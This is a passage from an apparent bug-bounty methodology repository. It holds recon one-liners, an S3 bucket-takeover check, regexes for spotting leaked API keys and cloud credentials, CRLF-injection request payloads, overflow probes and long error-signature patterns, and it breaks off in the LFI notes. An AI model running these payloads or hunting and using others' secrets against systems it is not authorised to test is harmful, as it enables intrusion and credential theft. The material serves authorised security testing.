```
├── AWS.md
├── ApiKey.md
├── Buffer-Overflow.md
├── CRLF.md
├── CV
│   ├── GochaOkradzeCV.pdf
│   └── GochaOkradze_CV_EN.pdf
├── Cors-Origin.md
├── Crawl_Parameters.md
├── EndpointsExtractor.md
├── ErrorsAndVulnsDetect.md
├── Georgian-Recon.md
├── Gospider.md
├── IP_regex.md
├── Img
│   ├── Screenshot from 2019-05-10 02-25-10.png
│   ├── Screenshot from 2019-05-10 02-40-35.png
│   ├── Screenshot from 2019-05-10 09-56-26.png
│   ├── Screenshot from 2019-05-10 10-08-11.png
│   └── empty.md
├── LFI.md
├── MyBugBountyMethodology.md
├── OpenRedirect_SSRF.md
├── RCE.md
├── README.md
├── ReconWithBurp_Suite.md
├── SQLiError.md
├── Secret_Patterns_db.MD
├── SubRegex.md
├── SubdomainsToBurp.md
├── Time-Based-SQLi.md
├── WEB APPLICATION PENTESTING CHECKLIST.pdf
├── WebDAV.md
├── bxss_js.md
├── content_discovery.md
├── file_upload.md
├── htmlattribs
├── paramName-inputTag.md
├── translate
│   └── wahh-yandex-translate-ru.pdf
├── web ports.md
├── wordlists
│   ├── 1.json
│   ├── 2.json
│   ├── README.md
│   ├── b.json
│   ├── blind-time-based-sqli-payloads.txt
│   ├── common_api_paths.txt
│   ├── content.txt
│   ├── lfi-linux.txt
│   ├── parameters.txt
│   ├── s0md3v_XSS.txt
│   ├── sensitive.txt
│   ├── ssrf.txt
│   ├── swagger.json
│   ├── testSwagger
│   │   ├── 06.json
│   │   ├── c.json
│   │   ├── j.json
│   │   ├── q.json
│   │   ├── t.json
│   │   ├── w.json
│   │   └── y.json
│   └── xssAttacks.json
├── xpath.md
├── xss from img for S3 bucket.md
├── xss.md
└── xxe.md
```

--------------------------------------------------------------------------------
/AWS.md:
--------------------------------------------------------------------------------
# AWS
Search for AWS URLs and keys in the response body.
### Regex

Each pattern ends its character class with `+` so that Burp's grep-extract captures the whole URL or bucket name rather than a single character.

AMAZON_URL: ```https?://[^\"\\'> ]+```

AMAZON_URL_1: ```[a-z0-9.-]+\.s3-[a-z0-9-]+\.amazonaws\.com```

AMAZON_URL_2: ```[a-z0-9.-]+\.s3-website[.-](eu|ap|us|ca|sa|cn)```

AMAZON_URL_3: ```s3\.amazonaws\.com/[a-z0-9._-]+```

AMAZON_URL_4: ```s3-[a-z0-9-]+\.amazonaws\.com/[a-z0-9._-]+```

URLS: ```https?://[^\"\\'> ]+```

AMAZON_KEY: ```([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}```
(the leading group only stops the prefix from matching inside a longer token; a real access key ID is 20 characters, so check the length of what you find)

UPLOAD_FIELDS: ```]\stype=[\"']?file[\"']?```


### Scan for S3 bucket takeover vuln

#### What you need
* golang
* subfinder or another subdomain collector: ```https://github.com/projectdiscovery/subfinder```
* gospider: ```https://github.com/jaeles-project/gospider```
* httpx: ```https://github.com/projectdiscovery/httpx```
* One-liner terminal command

```
subfinder -d hackerone.com -silent | httpx -silent | gospider -d 5 --sitemap --robots -w -r --subs | grep "\[aws-s3" | sed 's/\[aws-s3\] - //g' | httpx -silent -mr "NoSuchBucket" | tee s3-bucket-takeover.txt
```
gospider prefixes every S3 URL it finds in page content with `[aws-s3] - `; `sed` strips that prefix and the second `httpx` keeps only bucket URLs whose response contains `NoSuchBucket`, i.e. the bucket the page references no longer exists. That is only a takeover if you can still create a bucket with that exact name (bucket names are global) and the page or DNS record still points at it; confirm both before reporting.

--------------------------------------------------------------------------------
/ApiKey.md:
--------------------------------------------------------------------------------
# Api Key
Detect API keys in the request or response body.

How to use a key once found: https://github.com/streaak/keyhacks


### Keys:
ATOMIST_API_KEY : ```\b[A-F0-9]{64}\b``` (any 64 upper-case hex characters, so SHA-256 digests match too; verify hits)

TWITTER_ACCESS_TOKEN : ```[1-9][0-9]+-[0-9a-zA-Z]{40}```

FACEBOOK_ACCESS_TOKEN : ```EAACEdEose0cBA[0-9A-Za-z]+```

GOOGLE_API_KEY: ```AIza[0-9A-Za-z\-_]{35}```

GOOGLE_OAUTH_ID : ```[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com```

PICATIC_API_KEY : ```sk_live_[0-9a-z]{32}```

STRIPE_REGULAR_API_KEY : ```sk_live_[0-9a-zA-Z]{24}```

STRIPE_RESTRICTED_API_KEY: ```rk_live_[0-9a-zA-Z]{24}```

SQUARE_OAUTH_TOKEN: ```sq0atp-[0-9A-Za-z\-_]{22}```

SQUARE_OAUTH_SECRET: ```sq0csp-[0-9A-Za-z\-_]{43}```

BRAINTREE_ACCESS_TOKEN: ```access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}```

AMAZON_AUTH_TOKEN: ```amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}```

TWILIO_API_KEY: ```SK[0-9a-fA-F]{32}```

MAILGUN_KEY: ```key-[0-9a-zA-Z]{32}```

MAILCHIMP_API_KEY: ```[0-9a-f]{32}-us[0-9]{1,2}```

AMAZON_ACCESS_KEY:
```\bAK[0-9A-Z]{18}\b``` 39 | 40 | GITHUB_TOKEN: ```(https?:\/\/)(?:v1\.)?[a-f0-9]{40}((?::x-oauth-basic)?@)``` 41 | 42 | URL_PASSWORD: ```((?:ht|f|sm)tps?:\/\/[^:/?#\[\]@""<>{}|\\^``\s]+:)[^:/?#\[\]@""<>{}|\\^``\s]+@``` 43 | 44 | slack_token: ```(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})``` 45 | 46 | slack_webhook: ```https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}``` 47 | 48 | facebook_oauth: ```[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\"\s][0-9a-f]{32}['\"\s]``` 49 | 50 | twitter_oauth: ```[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\s][0-9a-zA-Z]{35,44}['\"\s]``` 51 | 52 | heroku_api: ```[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}``` 53 | 54 | google_captcha: ```6L[0-9A-Za-z-_]{38}``` 55 | 56 | google_oauth: ```ya29\.[0-9A-Za-z\-_]+``` 57 | 58 | 59 | 60 | 61 | #### Burp regexp 62 | 63 | ``` 64 | [0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com|[0-9a-f]{32}-us[0-9]{1,2}|[1-9][0-9]+-[0-9a-zA-Z]{40}|6L[0-9A-Za-z-_]{38}|AC[a-zA-Z0-9_\-]{32}|access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}|AIza[0-9A-Za-z-_]{35}|AIza[0-9A-Za-z\-_]{35}|AKIA[0-9A-Z]{16}|amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}|AP[a-zA-Z0-9_\-]{32}|api[key|\s*]+[a-zA-Z0-9_\-]+|[a-zA-Z0-9_-]*:[a-zA-Z0-9_\-]+@github\.com*|\b[A-F0-9]{64}\b|\bAK[0-9A-Z]{18}\b|basic [a-zA-Z0-9_\-:\.]+|bearer [a-zA-Z0-9_\-\.]+|-----BEGIN PRIVATE KEY-----[a-zA-Z0-9\S]{100,}-----END PRIVATE KEY-----|-----BEGIN RSA PRIVATE KEY-----[a-zA-Z0-9\S]{100,}-----END RSA PRIVATE 
KEY-----|EAACEdEose0cBA[0-9A-Za-z]+|eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_-]{10,}|[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\"\s][0-9a-f]{32}['\"\s]|[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}|((?:ht|f|sm)tps?:\/\/[^:/?#\[\]@""<>{}|\\^``\s]+:)[^:/?#\[\]@""<>{}|\\^``\s]+@|https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}|(https?:\/\/)(?:v1\.)?[a-f0-9]{40}((?::x-oauth-basic)?@)|key-[0-9a-zA-Z]{32}|rk_live_[0-9a-zA-Z]{24}|s3\.amazonaws.com[/]+|[a-zA-Z0-9_-]*\.s3\.amazonaws.com|SK[0-9a-fA-F]{32}|sk_live_[0-9a-z]{32}|sk_live_[0-9a-zA-Z]{24}|sq0atp-[0-9A-Za-z\-_]{22}|sq0csp-[ 0-9A-Za-z\-_]{43}|sq0csp-[0-9A-Za-z\-_]{43}|sqOatp-[0-9A-Za-z\-_]{22}|[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\s][0-9a-zA-Z]{35,44}['\"\s]|(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})|ya29\.[0-9A-Za-z\-_]+ 65 | ``` 66 | -------------------------------------------------------------------------------- /Buffer-Overflow.md: -------------------------------------------------------------------------------- 1 | # Buffer Overflow 2 | Users have to know that detecting a buffer overflow vulnerability will be only possible if the server is configured to return errors, and the application is developed in cgi-c or some other language that allows the programmer to do their own memory management. 3 | 4 | #TODO: if lengths = ```[ 65 , 257 , 513 , 1025, 2049, 4097, 8000 ]``` then I get a BadStatusLine exception from urllib2, is seems to be an internal error. Tested against tomcat 5.5.7 5 | 6 | ### Payload 7 | Build Payloads 8 | Example: ```['A' * payload_len for payload_len in [65, 257, 513, 1025, 2049]]``` 9 | 10 | ### Errors 11 | ##### Regexp: 12 | ``` 13 | stack smashing detected |Backtrace|Memory map 14 | ``` 15 | 16 | ``` 17 | # Note that the lack of commas after the strings is intentional 18 | 19 | 500 Internal Server Error 20 | 21 |

Internal Server Error
```
(the two strings above are the `<title>` and `<h1>` text of the Apache error page)

### Some notes:
On Apache, when an overflow happens in a cgic script, this is written to the log:
```
*** stack smashing detected ***

/var/www/.../buffer_overflow.cgi terminated,
referer: http://localhost/w3af/buffer_overflow.cgi

Premature end of script headers: buffer_overflow.cgi,
referer: ...
```

On Apache, when an overflow happens in a cgic script, this is returned to the user (shown with the HTML tags stripped):
```
500 Internal Server Error

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@localhost and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Apache/2.0.55 (Ubuntu) mod_python/3.2.8 Python/2.4.4c1 PHP/5.1.6 Server at localhost Port 80
```

Note that this is an Apache error 500, not the more common PHP error 500.

--------------------------------------------------------------------------------
/CRLF.md:
--------------------------------------------------------------------------------
### CRLF Injection

#### Regexp 'Detect in response':
```
(?m)^Set-Cookie:\s*crlf=injection
```
The `(?m)^` anchor only fires when the injected header starts a line, i.e. it landed in the response headers; the same string merely echoed inside the body does not match, which is what you want. The payloads below write `Set-Cookie:crlf=injection` with no space after the colon, so the regexp uses `\s*` rather than a literal space. Grep the headers, not only the body.


#### Request payloads:

```
/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:crlf=injection
/%0d%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:crlf=injection
/%23%0aSet-Cookie:crlf=injection
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
/%3f%0d%0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
/%u000aSet-Cookie:crlf=injection
```

--------------------------------------------------------------------------------
/CV/GochaOkradzeCV.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ghsec/webHunt/ea37c327ce7316b0ad2ae84d0dcac5bfdbdfb8e2/CV/GochaOkradzeCV.pdf

--------------------------------------------------------------------------------
/CV/GochaOkradze_CV_EN.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ghsec/webHunt/ea37c327ce7316b0ad2ae84d0dcac5bfdbdfb8e2/CV/GochaOkradze_CV_EN.pdf

--------------------------------------------------------------------------------
/Cors-Origin.md:
--------------------------------------------------------------------------------
# Cors-Origin

Inspect if the application checks that the value of the "Origin" HTTP header
is consistent with the value of the remote IP address/Host of the sender of the incoming HTTP request. In practice the finding that matters is a server that echoes an arbitrary `Origin` back in `Access-Control-Allow-Origin` (or answers `null`) while also sending `Access-Control-Allow-Credentials: true`: any site the victim visits can then read authenticated responses. Send the request once per method below with a foreign `Origin` and compare the CORS headers.


```
SENSITIVE_METHODS = ('PUT', 'DELETE')
COMMON_METHODS = ('POST', 'GET', 'OPTIONS', 'PUT', 'DELETE')
```

Good example from H1:
https://hackerone.com/reports/235200

### Post based CORS Misconfiguration PoC

```
```

--------------------------------------------------------------------------------
/Crawl_Parameters.md:
--------------------------------------------------------------------------------
# Crawl parameters with getallurls

- Download gau | link: https://github.com/lc/gau
- Compile
```go build gau.go```

- Move ```gau``` to /usr/bin
```sudo mv gau /usr/bin```

### Usage:
```gau -subs domain.com | grep -oP "(\?|\&)\w+" | tr -d "?|&" | sort -u | tee params```

### GREP
Grepping parameter names from `<input>` tags in the response body:

```grep -oP "<input[^>]*>" | grep -oP "name=[\"'].+" | cut -d "\"" -f2```

### Crawl and scan

* Add this function to your .bashrc file.

First download and install htmlattribs by tomnomnom from the repository:

https://github.com/tomnomnom/hacks/tree/master/htmlattribs

```
# Parameter scanner with Jaeles
### Input tag
checkparam(){
    for i in $(cat $1); do
        curl -sk "$i" | htmlattribs name input | tee params.txt
        jaeles scan -v -s ~/path_To_Jaeles_Signature/xss.yaml -u "$i"
        rm params.txt
    done
}

```

* Collect URLs with your favourite tool ("Burp, gospider, hakrawler").
* Check which URLs contain an `<input>` tag with ffuf (`-mr` keeps only responses that match the regexp):

```
ffuf -u FUZZ -w urls.txt -mr "<input"
```

--------------------------------------------------------------------------------
/EndpointsExtractor.md:
--------------------------------------------------------------------------------
Regexp for extracting endpoints from JS files (the LinkFinder regex; the same one is used in ReconWithBurp_Suite.md):

```
(?:"|')(((?:[a-zA-Z]{1,10}://|//)[^"'/]{1,}\.[a-zA-Z]{2,}[^"']{0,})|((?:/|\.\./|\./)[^"'><,;| *()(%%$^/\\\[\]][^"'><,;|()]{1,})|([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}\.(?:[a-zA-Z]{1,4}|action)(?:[\?|/][^"|']{0,}|))|([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^"|^']{0,}|)))(?:"|')
```

--------------------------------------------------------------------------------
/ErrorsAndVulnsDetect.md:
--------------------------------------------------------------------------------
Copy this joined regexp and use it in Burp.

Edit the fuzz list to suit the target.

### Fuzz List by @1N3

https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/full_fuzz.txt

### Detect errors and vulnerabilities

Useful for spotting errors and vulns while fuzzing with a custom payload list. When you join patterns, make sure the result never contains an empty alternative (`||`): an empty branch matches every response and the grep becomes useless.


```
injectx|stack smashing detected|Backtrace|Memory map|500 Internal Server Error|Set-Cookie:\s*crlf=injection|java\.io\.FileNotFoundException|java\.lang\.Exception|java\.lang\.IllegalArgumentException|java\.net\.MalformedURLException|Warning: include\(|Warning: unlink\(|for inclusion \(include_path=|fread\(|Failed opening required|Warning: file_get_contents\(|Fatal error: require_once\(|Warning: file_exists\(|root:|(uid|gid|groups)=\d+|bytes from \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b|Configuration File \(php\.ini\) Path |vulnerable 10|Trying \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b|\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b\s+localhost|BROADCAST,MULTICAST|drwxr-xr|Active Internet connections|Syntax error|sh:|Average Speed Time|dir: cannot access|drwxrwxr|GNU/Linux|(Exception (condition )?\d+\.
Transaction rollback|com\.frontbase\.jdbc|org\.h2\.jdbc|Unexpected end of command in statement \["|Unexpected token.*?in statement \[|org\.hsqldb\.jdbc|CLI Driver.*?DB2|DB2 SQL error|\bdb2_\w+\(|SQLSTATE.+SQLCODE|com\.ibm\.db2\.jcc|Zend_Db_(Adapter|Statement)_Db2_Exception|Pdo[./_\\]Ibm|DB2Exception|Warning.*?\Wifx_|Exception.*?Informix|Informix ODBC Driver|ODBC Informix driver|com\.informix\.jdbc|weblogic\.jdbc\.informix|Pdo[./_\\]Informix|IfxException|Warning.*?\Wingres_|Ingres SQLSTATE|Ingres\W.*?Driver|com\.ingres\.gcf\.jdbc|Dynamic SQL Error|Warning.*?\Wibase_|org\.firebirdsql\.jdbc|Pdo[./_\\]Firebird|Microsoft Access (\d+ )?Driver|JET Database Engine|Access Database Engine|ODBC Microsoft Access|Syntax error \(missing operator\) in query expression|Driver.*? SQL[\-\_\ ]*Server|OLE DB.*? SQL Server|\bSQL Server[^<"]+Driver|Warning.*?\W(mssql|sqlsrv)_|\bSQL Server[^<"]+[0-9a-fA-F]{8}|System\.Data\.SqlClient\.SqlException|(?s)Exception.*?\bRoadhouse\.Cms\.|Microsoft SQL Native Client error '[0-9a-fA-F]{8}|\[SQL Server\]|ODBC SQL Server Driver|ODBC Driver \d+ for SQL Server|SQLServer JDBC Driver|com\.jnetdirect\.jsql|macromedia\.jdbc\.sqlserver|Zend_Db_(Adapter|Statement)_Sqlsrv_Exception|com\.microsoft\.sqlserver\.jdbc|Pdo[./_\\](Mssql|SqlSrv)|SQL(Srv|Server)Exception|SQL syntax.*?MySQL|Warning.*?\Wmysqli?_|MySQLSyntaxErrorException|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version|Unknown column '[^ ]+' in 'field list'|MySqlClient\.|com\.mysql\.jdbc|Zend_Db_(Adapter|Statement)_Mysqli_Exception|Pdo[./_\\]Mysql|MySqlException|\bORA-\d{5}|Oracle error|Oracle.*?Driver|Warning.*?\W(oci|ora)_|quoted string not properly terminated|SQL command not properly ended|macromedia\.jdbc\.oracle|oracle\.jdbc|Zend_Db_(Adapter|Statement)_Oracle_Exception|Pdo[./_\\](Oracle|OCI)|OracleException|PostgreSQL.*?ERROR|Warning.*?\Wpg_|valid PostgreSQL result|Npgsql\.|PG::SyntaxError:|org\.postgresql\.util\.PSQLException|ERROR:\s\ssyntax error at 
or near|ERROR: parser: parse error at or near|PostgreSQL query failed|org\.postgresql\.jdbc|Pdo[./_\\]Pgsql|PSQLException|SQL error.*?POS([0-9]+)|Warning.*?\Wmaxdb_|DriverSapDB|com\.sap\.dbtech\.jdbc|SQLite/JDBCDriver|SQLite\.Exception|(Microsoft|System)\.Data\.SQLite\.SQLiteException|Warning.*?\W(sqlite_|SQLite3::)|\[SQLITE_ERROR\]|SQLite error \d+:|sqlite3.OperationalError:|SQLite3::SQLException|org\.sqlite\.JDBC|Pdo[./_\\]Sqlite|SQLiteException|Warning.*?\Wsybase_|Sybase message|Sybase.*?Server message|SybSQLException|Sybase\.Data\.AseClient|com\.sybase\.jdbc)|System\.Xml\.XPath\.XPathException|MS\.Internal\.Xml|Unknown error in XPath|org\.apache\.xpath\.XPath|A closing bracket expected in|An operand in Union Expression does not produce a node-set|Cannot convert expression to a number|Document Axis does not allow any context Location Steps|Empty Path Expression|DOMXPath|Empty Relative Location Path|Empty Union Expression|Expected \'\)\' in|Expected node test or name specification after axis operator|Incompatible XPath key|Incorrect Variable Binding|libxml2 library function failed|libxml2|Invalid predicate|Invalid expression|xmlsec library function|xmlsec|error \'80004005\'|A document must contain exactly one root element|Expression must evaluate to a node-set|Expected token ']'|

msxml4\.dll<\/font>|msxml3\.dll<\/font>|4005 Notes error: Query is not understandable|SimpleXMLElement::xpath|xmlXPathEval:|simplexml_load_string|parser error :|An error occured!|xmlParseEntityDecl|xmlParseInternalSubset|DOCTYPE improperly terminated|Start tag expected|No declaration for attribute|No declaration for element|failed to load external entity|Invalid URI: file:\/\/\/|Malformed declaration expecting version|Unicode strings with encoding|must be well-formed|Content is not allowed in prolog|org.xml.sax|SAXParseException|com.sun.org.apache.xerces|ParseError|nokogiri|REXML|XML syntax error on line|Error unmarshaling XML|conflicts with field|illegal character code|XML Parsing Error|SyntaxError|no root element|not well-formed|313374|ssrfhere
```

--------------------------------------------------------------------------------
/Georgian-Recon.md:
--------------------------------------------------------------------------------
# Recon:

### OS: Ubuntu
..................................................

## Required tools
1. [Golang installation](https://golang.org/doc/install)

2. [OwaspAmass](https://github.com/OWASP/Amass)

3. [Subfinder](https://github.com/projectdiscovery/subfinder)

4. [Findomain](https://github.com/Edu4rdSHL/findomain)

5. [Assetfinder](https://github.com/tomnomnom/assetfinder)

6. [Github-Search](https://github.com/gwen001/github-search)

7. [GoAltdns](https://github.com/subfinder/goaltdns)

8. [MassDns](https://github.com/blechschmidt/massdns)

9. [gau](https://github.com/lc/gau)

10. [GoSpider](https://github.com/jaeles-project/gospider)

11. [Jaeles](https://github.com/jaeles-project/jaeles)

12. [Ffuf](https://github.com/ffuf/ffuf)

13. [DirSearch](https://github.com/maurosoria/dirsearch)

14. [Httprobe](https://github.com/tomnomnom/httprobe)


## Wordlists:
* [RobotsDisallowed](https://github.com/danielmiessler/RobotsDisallowed)
* [SecLists Web Content](https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content)
* [content_discovery_nullenc0de](https://gist.github.com/nullenc0de/96fb9e934fc16415fbda2f83f08b28e7)
* [content_discovery_all](https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10)
* [commonspeak2](https://github.com/assetnote/commonspeak2-wordlists)
* [all.txt](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056)


## Recon Subdomains

- Owasp Amass : ```amass enum -d DOMAIN -o amass```

- Subfinder: ```subfinder -d DOMAIN -o subfinder```

- Findomain: ```findomain -t DOMAIN -o```

- Assetfinder: ```assetfinder DOMAIN | tee assetfinder```

- Gobuster: ```gobuster dns -d DOMAIN -w ~/PATH/all.txt -t 250 -o gobuster```

- github-search/github-subdomains.py: ```python3 github-subdomains.py -d DOMAIN -t TOKEN``` (TOKEN is a GitHub personal access token)

- https://securitytrails.com/list/apex_domain/DOMAIN (grep the page, or use the API)

- https://subdomainfinder.c99.nl/

### Extract the unique subdomains and save them to the file uniq
```cat * | sort -u | tee uniq```

```rm ...``` delete every output file that is no longer needed, keeping only uniq.


### Generate candidate subdomains of the subdomains and resolve them
```goaltdns -l uniq -w all.txt -o generated```

```massdns generated -r /massdns/lists/resolvers.txt -t A -o S -w results.txt```

```sed 's/A.*//' results.txt | sed 's/CN.*//' | sed 's/\..$//' > massdns```
(massdns `-o S` prints `host. A 1.2.3.4`; the three `sed`s keep the host name and drop its trailing dot)

```cat uniq massdns | sort -u | tee uniq.txt```

The same step can be repeated with goaltdns using the word.txt file instead of all.txt.


### HttpProbe Live
```cat uniq.txt | httprobe | tee hosts```

--------------------------------------------------------------------------------
/Gospider.md:
--------------------------------------------------------------------------------
# Spidering with Gospider
[Gospider](https://github.com/jaeles-project/gospider)

### Collect Endpoints

Collect URLs and save them to a file:
```
gospider -S hosts -d 16 -a -c 250 | tee gospider
```

### Extract urls

Replace `domain.com` with the target; the pattern keeps only URLs on the target's subdomains.
```
cat gospider | grep -oP "http(s)?://((?i)(([a-zA-Z0-9]{1}|[_a-zA-Z0-9]{1}[_a-zA-Z0-9-]{0,61}[a-zA-Z0-9]{1})[.]{1})+)?domain.com.*" | tee extract
```

### Sort unique urls

```
sort -u extract | tee urls
```

--------------------------------------------------------------------------------
/IP_regex.md:
--------------------------------------------------------------------------------
# IP Regex

grep IP addresses from the response

```
\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b
```
This matches any dotted quad, including octets above 255 and version strings such as 2.10.3.1, so filter the hits before treating one as an internal address leak.
--------------------------------------------------------------------------------
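The patterns in AWS.md, ApiKey.md and this file are written for Burp's grep-match, which only reports that something matched. The Python below is an added example, not code from the webHunt repository: it runs a handful of those regexes over a response body the way a scanner would, returns every matched value with a label, validates each dotted quad with the `ipaddress` module so octets above 255 are dropped, and splits the surviving addresses into internal and external. The response body, the Google key, the Slack webhook and the bucket name are constructed; the AWS key is the example key from AWS's own documentation; the SQL-error pattern is a four-signature subset of the SQLiError.md list.

```python
import ipaddress
import re

# Patterns from AWS.md / ApiKey.md / IP_regex.md. Two deliberate changes: the AWS
# key uses look-around instead of a capturing prefix group so the match is the key
# itself, and the S3 host pattern carries the quantifiers it needs to match a name.
PATTERNS = {
    "AWS_ACCESS_KEY_ID": re.compile(
        r"(?<![A-Z0-9])(?:AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16,17}(?![A-Z0-9])"
    ),
    "GOOGLE_API_KEY": re.compile(r"AIza[0-9A-Za-z\-_]{35}"),
    "SLACK_WEBHOOK": re.compile(
        r"https://hooks\.slack\.com/services/T[A-Za-z0-9_]{8}/B[A-Za-z0-9_]{8}/[A-Za-z0-9_]{24}"
    ),
    "S3_BUCKET_HOST": re.compile(r"\b[a-z0-9.-]+\.s3(?:-[a-z0-9-]+)?\.amazonaws\.com\b"),
    "IPV4": re.compile(r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b"),
    # small subset of the SQLiError.md signature list
    "SQL_ERROR": re.compile(r"SQL syntax.*?MySQL|\bORA-\d{5}|PG::SyntaxError:|\[SQL Server\]"),
}


def classify_ip(value: str):
    """Return 'IPV4_INTERNAL' or 'IPV4_EXTERNAL', or None when an octet exceeds 255."""
    try:
        addr = ipaddress.IPv4Address(value)
    except ValueError:          # e.g. 999.1.1.1: looks like an IP to the regex, is not one
        return None
    return "IPV4_INTERNAL" if addr.is_private else "IPV4_EXTERNAL"


def scan(body: str) -> list[tuple[str, str]]:
    """Run every pattern over a response body and return (label, matched value) pairs."""
    findings = []
    for label, pattern in PATTERNS.items():
        for m in pattern.finditer(body):
            value = m.group(0)
            if label == "IPV4":
                ip_label = classify_ip(value)
                if ip_label is None:
                    continue
                findings.append((ip_label, value))
            else:
                findings.append((label, value))
    return findings


# Constructed sample response body (not captured from any real target).
AWS_EXAMPLE_KEY = "AKIAIOSFODNN7EXAMPLE"      # the example key from AWS's documentation
GOOGLE_KEY = "AIza" + "0" * 35                 # constructed, right shape only
SLACK_HOOK = "https://hooks.slack.com/services/T" + "0" * 8 + "/B" + "0" * 8 + "/" + "X" * 24
SAMPLE_BODY = "\n".join([
    "// constructed build config",
    "var cfg = {",
    f'  awsKey: "{AWS_EXAMPLE_KEY}",',
    f'  mapsKey: "{GOOGLE_KEY}",',
    f'  hook: "{SLACK_HOOK}",',
    '  assets: "https://static-assets.s3-eu-west-1.amazonaws.com/app.js",',
    '  backend: "http://10.0.0.5:8080/api",',
    '  dns: "8.8.8.8",',
    '  version: "2.10.3.1",',     # valid octets, so it survives as an "external IP"
    '  bogus: "999.1.1.1"',       # dropped by classify_ip
    "};",
    "// You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version",
])

if __name__ == "__main__":
    for label, value in scan(SAMPLE_BODY):
        print(f"{label:18} {value}")
```

Version strings such as `2.10.3.1` pass the octet check, so an `IPV4_EXTERNAL` hit is a candidate to look at, not a finding; the 64-hex-character and `bearer ...` patterns in ApiKey.md are far noisier than the ones used here and are best run as a second pass over pages this first pass flags.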
/Img/Screenshot from 2019-05-10 02-25-10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghsec/webHunt/ea37c327ce7316b0ad2ae84d0dcac5bfdbdfb8e2/Img/Screenshot from 2019-05-10 02-25-10.png -------------------------------------------------------------------------------- /Img/Screenshot from 2019-05-10 02-40-35.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghsec/webHunt/ea37c327ce7316b0ad2ae84d0dcac5bfdbdfb8e2/Img/Screenshot from 2019-05-10 02-40-35.png -------------------------------------------------------------------------------- /Img/Screenshot from 2019-05-10 09-56-26.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghsec/webHunt/ea37c327ce7316b0ad2ae84d0dcac5bfdbdfb8e2/Img/Screenshot from 2019-05-10 09-56-26.png -------------------------------------------------------------------------------- /Img/Screenshot from 2019-05-10 10-08-11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ghsec/webHunt/ea37c327ce7316b0ad2ae84d0dcac5bfdbdfb8e2/Img/Screenshot from 2019-05-10 10-08-11.png -------------------------------------------------------------------------------- /Img/empty.md: -------------------------------------------------------------------------------- 1 | empty file 2 | -------------------------------------------------------------------------------- /LFI.md: -------------------------------------------------------------------------------- 1 | ### LFI 2 | 3 | #### Errors: 4 | ``` 5 | Detect Payload: abc.txt 6 | ``` 7 | 8 | ##### Java Errors: 9 | ``` 10 | java\.io\.FileNotFoundException|java\.lang\.Exception|java\.lang\.IllegalArgumentException|java\.net\.MalformedURLException 11 | ``` 12 | ##### PHP Errors: 13 | ``` 14 | Warning: include\(|Warning: unlink\(|for inclusion 
